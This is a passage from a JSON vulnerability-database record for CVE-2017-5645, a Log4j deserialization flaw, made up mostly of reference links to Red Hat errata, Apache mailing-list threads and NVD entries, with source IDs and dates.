"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/12/19/2"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:1801"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:1802"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:2423"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:2635"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:2636"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:2638"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:2811"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:2888"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:2889"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:3244"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:3399"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:3400"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1040200"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1041294"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3cdev.logging.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3cissues.beam.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3cgithub.beam.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3cdev.logging.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3cgithub.beam.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3cgithub.beam.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3cdev.logging.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3cissues.bookkeeper.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3cissues.geode.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3ccommits.logging.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3ccommits.doris.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3cannounce.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3cdev.tika.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3cgithub.beam.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3cgithub.beam.apache.org%3e"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2017-5645"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5645"
},
{
"trust": 0.7,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-9970"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6644"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-2582"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2015-6644"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-7536"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2014-9970"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7536"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-2582"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/installation-guide/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2017-5664"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5664"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2017-7525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform?version=6.4/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7525"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397@%3cissues.activemq.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917@%3cannounce.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd@%3cgithub.beam.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f@%3cgithub.beam.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8@%3cgithub.beam.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83@%3cgithub.beam.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44@%3cgithub.beam.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287@%3cissues.beam.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3cissues.bookkeeper.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422@%3ccommits.doris.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3cissues.geode.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d@%3ccommits.logging.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc@%3cdev.logging.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125@%3cdev.logging.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9@%3cdev.logging.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad@%3cdev.tika.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13936"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-6950"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1935"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17510"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13956"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13920"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13954"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-18640"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13920"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5410"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27216"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13934"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28165"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9484"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14297"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11996"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12402"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12402"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13954"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25638"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14340"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.9.0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14297"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-17510"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11996"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13956"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27807"
},
{
"trust": 0.1,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14340"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26945"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25644"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13936"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5421"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28052"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-17518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13935"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=7.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-2510"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.3.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11798"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11798"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-2510"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-15691"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113848"
},
{
"db": "PACKETSTORM",
"id": "163798"
},
{
"db": "PACKETSTORM",
"id": "144347"
},
{
"db": "PACKETSTORM",
"id": "144358"
},
{
"db": "PACKETSTORM",
"id": "153344"
},
{
"db": "PACKETSTORM",
"id": "144360"
},
{
"db": "PACKETSTORM",
"id": "144013"
},
{
"db": "PACKETSTORM",
"id": "142856"
},
{
"db": "PACKETSTORM",
"id": "144018"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003152"
},
{
"db": "NVD",
"id": "CVE-2017-5645"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-113848",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2017-5645",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163798",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "144347",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "144358",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "153344",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "144360",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "144013",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "142856",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "144018",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003152",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2017-5645",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2017-04-17T00:00:00",
"db": "VULHUB",
"id": "VHN-113848",
"ident": null
},
{
"date": "2017-04-17T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5645",
"ident": null
},
{
"date": "2021-08-12T15:42:56",
"db": "PACKETSTORM",
"id": "163798",
"ident": null
},
{
"date": "2017-09-26T03:56:00",
"db": "PACKETSTORM",
"id": "144347",
"ident": null
},
{
"date": "2017-09-27T06:16:07",
"db": "PACKETSTORM",
"id": "144358",
"ident": null
},
{
"date": "2019-06-19T17:19:04",
"db": "PACKETSTORM",
"id": "153344",
"ident": null
},
{
"date": "2017-09-27T06:16:28",
"db": "PACKETSTORM",
"id": "144360",
"ident": null
},
{
"date": "2017-09-05T23:23:00",
"db": "PACKETSTORM",
"id": "144013",
"ident": null
},
{
"date": "2017-06-08T14:39:46",
"db": "PACKETSTORM",
"id": "142856",
"ident": null
},
{
"date": "2017-09-06T04:16:37",
"db": "PACKETSTORM",
"id": "144018",
"ident": null
},
{
"date": "2017-05-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003152",
"ident": null
},
{
"date": "2017-04-17T21:59:00.373000",
"db": "NVD",
"id": "CVE-2017-5645",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2020-10-20T00:00:00",
"db": "VULHUB",
"id": "VHN-113848",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5645",
"ident": null
},
{
"date": "2017-05-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003152",
"ident": null
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-5645",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "163798"
},
{
"db": "PACKETSTORM",
"id": "144347"
},
{
"db": "PACKETSTORM",
"id": "144358"
},
{
"db": "PACKETSTORM",
"id": "144360"
},
{
"db": "PACKETSTORM",
"id": "144013"
},
{
"db": "PACKETSTORM",
"id": "142856"
},
{
"db": "PACKETSTORM",
"id": "144018"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "Apache Log4j Vulnerable to unreliable data deserialization",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003152"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "144347"
},
{
